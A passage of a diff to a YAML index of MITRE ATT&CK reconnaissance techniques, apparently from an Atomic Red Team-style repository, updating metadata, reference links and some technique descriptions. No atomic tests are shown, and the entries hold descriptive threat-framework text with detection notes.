@@ -54816,7 +55491,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54832,8 +55507,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -54861,7 +55534,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54877,33 +55550,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -54917,18 +55590,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -54949,7 +55633,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54965,39 +55649,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -55005,13 +55687,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -55036,7 +55746,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55052,8 +55762,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -55075,7 +55783,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55091,8 +55799,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -55118,7 +55824,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55136,13 +55842,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55198,7 +55902,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -55249,7 +55953,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -55270,7 +55973,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55286,8 +55989,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -55309,7 +56010,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55325,8 +56026,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -55348,7 +56047,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55364,12 +56063,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55409,8 +56106,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -55455,11 +56152,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55499,9 +56195,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55563,7 +56258,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55589,7 +56283,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55610,8 +56304,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55676,7 +56368,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55724,7 +56415,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55746,7 +56436,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55762,34 +56452,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55798,15 +56464,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -55828,7 +56517,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55844,8 +56533,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -55906,29 +56593,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55937,15 +56605,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
